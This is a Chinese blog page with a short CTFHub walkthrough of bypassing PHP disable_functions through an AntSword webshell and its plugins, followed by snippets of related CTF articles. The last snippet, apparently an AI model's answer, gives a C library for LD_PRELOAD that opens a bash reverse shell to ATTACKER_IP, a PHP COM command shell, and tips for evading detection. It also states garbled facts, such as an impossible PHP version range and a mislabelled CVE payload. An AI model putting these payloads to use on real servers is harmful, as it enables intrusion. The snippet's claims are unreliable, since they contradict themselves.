CTFHub Bypass disable_function系列

最新推荐文章于 2025-07-23 20:38:49 发布

原创最新推荐文章于 2025-07-23 20:38:49 发布 · 203 阅读

1 ·

CC 4.0 BY-SA版权

文章标签：

#linux #运维 #服务器

LD_PRELOAD

目标:获取服务器上 /flag 文件中的 flag。需要了解 Linux LD_PRELOAD 环境变量

进入环境我们发现有一个一句话木马，我们使用工具进行连接

右键打开终端发现被禁用，尝试使用插件绕过

进入目录发现多了一个文件，复制文件路径继续尝试连接

再次打开虚拟终端，尝试使用命令，成功获取

ShellShock

进入环境，连接工具

使用base64连接

启用插件

绕过成功

Apache Mod CGI

进入环境，点击getflag，使用工具进行连接，插件绕过

取得flag

剩下的题目与上述方式相同，只是插件功能不同，一个一个尝试即可

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Paper_F1nd

关注关注

2
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

Bypass disable_function【CTFHUB】

D.MIND 的博客

05-12

1668

LD_PRELOAD是Linux下的环境变量它的本意是，允许程序优先加载指定的动态库。这样能够选择不同的动态库中的相同的函数或者变量。使用场景是：当使用别人提供的动态库，发现其中某些函数实现不合理。但不能要求别人为你修改源代码并重新生成动态库。在这种情况下，使用LD_PRELOAD可以使用自定义的代码替换别人动态库中的部分代码。利用环境变量 LD_PRELOAD 劫持系统函数，让外部程序加载恶意 *.so，达到执行系统命令的效果。利用条件： 1. 能够上传自己的.so文件 2. 能够控制环境变量

CTFHub Bypass disable_function系列（已完结）

feng的博客

10-14

4461

LD_PRELOAD 首先我们需要了解LD_PRELOAD这个环境变量，这里有两篇文章可以参考：警惕UNIX下的LD_PRELOAD环境变量利用环境变量LD_PRELOAD来绕过php%20disable_function 读完之后就会对LD_PRELOAD这个环境变量有所了解，知道了它是干什么的，但是对于如何利用还不太清楚。利用这个环境变量的话，可以使用这些函数： putenv() error_log() mail() LD_PRELOAD是Linux系统的一个环境变量，它可以影响程序的运行时

参与评论您还未登录，请先登录后发表或查看评论

CTFHub技能书Bypass disable_function

最新发布

2301_78563207的博客

07-23

217

我们查看flag文件，发现页面什么都没显示，但大小显示33b，我们接着查看readflag文件，在里边发现了提示我们进行读取文件，查看flag。在网站的目录下发现被创建了一个新的php文件，这个文件可以帮助我们绕过他的权限进行执行的操作，但我们需要选用这个文件的地址，再次进行蚁剑的连接。所以我们尝试使用蚁剑进行直接连接，发现能够连接，并在根目录中找到了关于flag的两个文件。与第一关类似，选择模式如下，重新连接创建文件后的木马，终端访问。与上一关类似，选择模式如下，重新连接创建文件后的木马，终端访问。

ctfhub disable_functions

2401_88387979的博客

12-24

826

在前面的关卡中，我们已经学会使用绕过插件进行禁用函数绕过，下面我们来秒过吧。这里测试连接失败，将编码器改为base64，就能连接成功了。鼠标右键打开虚拟终端，测试命令，发现终端被禁用，尝试绕过。可以发现页面显示一个一句话木马，复制网址，尝试蚁剑连接。鼠标右键--插件市场，添加本地插件，重启应用。鼠标右键--加载插件--辅助工具--绕过。再次打开虚拟终端，尝试使用命令，成功获取。进入初始环境界面，点击‘GetFlag’发现和上一关一样，继续尝试蚁剑连接。返回，鼠标右键--编辑数据。本关同样使用禁用函数绕过。

CTFHub-bypass disable_function

a21536545645的博客

07-10

1146

一，LD_PRELOAD 前置知识: putenv:php函数,可以设置环境变量 mail()，error_log(): php的函数，会调用系统的sendmail函数发送邮件 LD_PRELOAD:linux环境变量，作用是他设置的.so会在程序本身的.so之前执行。题目情况存在一个shell，用蚂剑直接连接。进入虚拟终端执行命令发现ret=127，说明不能执行系统命令 /?ant=phpinfo();看到禁用了很多函数但是没有禁用putenv,error_log,email这几个函数思路创建

CTFhub Bypass disable_function

qq_54694921的博客

12-24

560

CTFhub Bypass disable_function 插件绕过！非常方便！

CTFHub Bypass disable_function 利用LD_PRELOAD绕过

z2560088的博客

10-04

1093

LD_PRELOAD是Linux系统的一个环境变量，它可以影响程序的运行时的链接（Runtime linker），它允许你定义在程序运行前优先加载的动态链接库。这个功能主要就是用来有选择性的载入不同动态链接库中的相同函数。通过这个环境变量，我们可以在主程序和其动态链接库的中间加载别的动态链接库，甚至覆盖正常的函数库。一方面，我们可以以此功能来使用自己的或是更好的函数（无需别人的源码），而另一方面，我们也可以以向别人的程序注入程序，从而达到特定的目的。 putenv()用来改变或增加环境变量的内容. 参数.

CTFhub Bypass disable_function LD_PRELOAD

qq_41497476的博客

07-29

896

基本做完了基础题目，开始进入进阶的题了，第一道题给我整懵了。知识盲区 <!DOCTYPE html> <html> <head> <title>CTFHub Bypass disable_function —— LD_PRELOAD</title> </head> <body> <h1>CTFHub Bypass disable_function —— LD_PRELOAD</h1> <

CTFHUB | web进阶 | PHP | Bypass disable_function | LD_PRELOAD

weixin_68416970的博客

08-07

317

CTFHUB | web进阶 | PHP | Bypass disable_function | LD_PRELOAD

ctfhub web全部做题记录(持续跟新)

01-08

信息泄露目录历遍直接找就行。。。 PHPINFO 进去直接 ctrl+f 搜flag就行。。。备份文件下载网站源码提示一些相关的名字可以写个简单的脚本爆破一下当然也可以 dirsearch 直接扫 import requests url = http://challenge-c93f188d4781b829.sandbox.ctfhub.com:10080/ a = ['web','website','backup','back','www','wwwroot','temp'] b = ['tar','tar.gz','zip','rar'] for i in a: fo

ctfhub-web进阶-[LD_PRELOAD]

o3Ev的博客

07-17

2074

ctfhub-web进阶-[LD_PRELOAD] 题目描述：目标:获取服务器上 /flag 文件中的 flag。需要了解 Linux LD_PRELOAD 环境变量。 CTFHub Bypass disable_function —— LD_PRELOAD 本环境来源于AntSword-Labs <!DOCTYPE html> <html> <head> <title>CTFHub Bypass disable_function —— LD_

ctfhub Bypass disable_function

weixin_63792060的博客

12-25

345

然后终端执行readflag。拼接到URL后面重新连接。复制URL使用蚁剑连接。写入shell.php。蚁剑连接，直接使用工具。

CTFHub之web进阶学习

bmth666的博客

01-13

2307

文章目录PHPBypass disable_functionLD_PRELOADShellShock(未完成)Apache Mod CGI(未完成) PHP Bypass disable_function PHP 的 disabled_functions主要是用于禁用一些危险的函数防止被一些攻击者利用有四种绕过 disable_functions 的手法：攻击后端组件，寻找存在命令注入的 w...

CTFHub技能树 Web进阶详解

weixin_45808483的博客

12-02

2769

PHP Bypass disable_function PHP 的 disabled_functions主要是用于禁用一些危险的函数防止被一些攻击者利用有四种绕过 disable_functions 的手法：攻击后端组件，寻找存在命令注入的 web 应用常用的后端组件，如，ImageMagick 的魔图漏洞、bash 的破壳漏洞等等寻找未禁用的漏网函数，常见的执行命令的函数有 system()、exec()、shell_exec()、passthru()，偏僻的popen()、proc_open

CTFHUB-web进阶LD_PRELOAD

qq_30396927的博客

05-30

1356

CTFHUB-web进阶LD_PRLOAD 知识点： LD_PRELOAD是Linux系统的一个环境变量，用于动态库的加载，动态库加载的优先级最高,即加载动态库时先加载LD_PRLOAD，它可以影响程序的运行时的链接（Runtime linker）。LD_PRELOAD的功能主要就是用来有选择性的载入不同动态链接库中的相同函数。通过这个环境变量，我们可以在主程序和其动态链接库的中间加载别的动态链接库，甚至覆盖正常的函数库。程序中我们经常要调用一些外部库的函数，以sendmail程序中的geteuid()为

Linux 环境变量LD_PRELOAD

小立仔

06-12

5230

Linux 下使用环境变量 LD_PRELOAD 简介以及使用其来 hook标准库中的函数

ctfhub -- LD_PRELOAD

qq_44640313的博客

06-18

528

在php中的disabled_functions主要是用于禁用一些危险的函数防止被一些攻击者利用。

CTFHub ShellShock解题记录

weixin_44732566的博客

04-07

1933

CTFHub Bypass disable_function ShellShock ShellShock,破壳漏洞，出现于2014年可以通过以下命令来判断是否存在这个漏洞 env x='() { :;}; echo vulnerable' bash -c "echo this is a test" 如果结果中有 vulnerable说明存在这个漏洞，执行了echo vulnerable这个语句...

蚁剑disable_function

03-16

<think>好的，我现在需要帮助用户了解如何绕过PHP的disable_functions限制，特别是使用蚁剑（AntSword）进行渗透测试的技术细节。首先，我需要回忆一下用户提供的参考引用内容，这些引用提到了几种绕过方法，比如php-json-bypass漏洞、Windows COM组件利用，以及蚁剑插件的相关利用方式。首先，用户的问题主要集中在蚁剑如何绕过disable_functions，所以可能需要具体说明蚁剑支持的插件或方法。根据引用[1]和[2]，php-json-bypass漏洞利用了PHP的json序列化程序中的堆溢出，适用于特定版本（如PHP 7.3.15到7.3.6之前）。而引用[2]还提到蚁剑插件中有集成这个漏洞的利用方式，这可能是一个关键点。然后，引用[3]提到利用Windows COM组件绕过disable_functions，这可能在Windows服务器环境下有效。需要确认蚁剑是否支持这种方法，或者是否需要手动上传特定的PHP文件如com_rce.php。接下来，我需要考虑用户可能需要了解的步骤，比如环境检测、插件使用、具体漏洞利用过程，以及不同方法的适用条件。例如，LD_PRELOAD绕过法需要存在未禁用的函数如mail()，而ImageMagick漏洞则需要服务器安装了该软件。同时，必须注意这些方法的合法性，强调渗透测试需要授权，避免用户误用。此外，要确保回答结构清晰，分点说明不同方法，并结合用户提供的引用来源，正确标注引用标记。最后，生成相关问题，帮助用户进一步探索相关技术细节和防御措施。需要确保问题覆盖不同绕过方法、环境检测、工具使用以及防御建议，这样用户可以有全面的了解。</think>### 绕过PHP disable_functions限制的蚁剑利用方法 #### 1. **前置条件与环境检测** - 确认目标PHP版本和操作系统类型（Linux/Windows） - 检查`disable_functions`列表是否禁用关键函数如`exec`、`shell_exec`等 - 查看是否存在可写目录权限（如`/tmp`或上传目录）[^1] #### 2. **常用Bypass方法及技术实现** **(1) PHP-JSON-Bypass (CVE-2019-11043)** ```php // 利用json序列化堆溢出触发命令执行 $payload = json_decode('{"@type":"C","@properties":{"a":1}}'); ``` - **适用条件**：PHP 7.3.15 < 版本 < 7.3.6 - **蚁剑操作**：使用`php-json-bypass`插件自动生成攻击载荷[^2] **(2) Windows COM组件利用** ```php $command = $_GET['cmd']; $wscript = new COM('WScript.Shell'); $exec = $wscript->Exec('cmd /c '.$command); ``` - **适用条件**：Windows服务器 + 启用COM组件 - **步骤**：上传`com_rce.php`后通过蚁剑连接[^3] **(3) LD_PRELOAD劫持** ```c // evil_lib.c #include <stdlib.h> __attribute__ ((__constructor__)) void angel (void){ unsetenv("LD_PRELOAD"); system("bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1'"); } ``` - **触发方式**：通过`putenv`+`mail()`函数链加载恶意so文件 #### 3. **蚁剑插件化利用流程** ```mermaid graph TD A[环境检测] --> B{系统类型} B -->|Linux| C[尝试LD_PRELOAD/GC_UAF] B -->|Windows| D[尝试COM组件/FFI扩展] C --> E[上传.so/.php后门] D --> F[执行COM命令] ``` #### 4. **防御规避要点** - 使用`pcntl_exec`替代`system`等敏感函数 - 通过`stream_wrapper`伪装成正常文件操作 - 利用PHP-FPM未授权访问漏洞建立隐蔽通道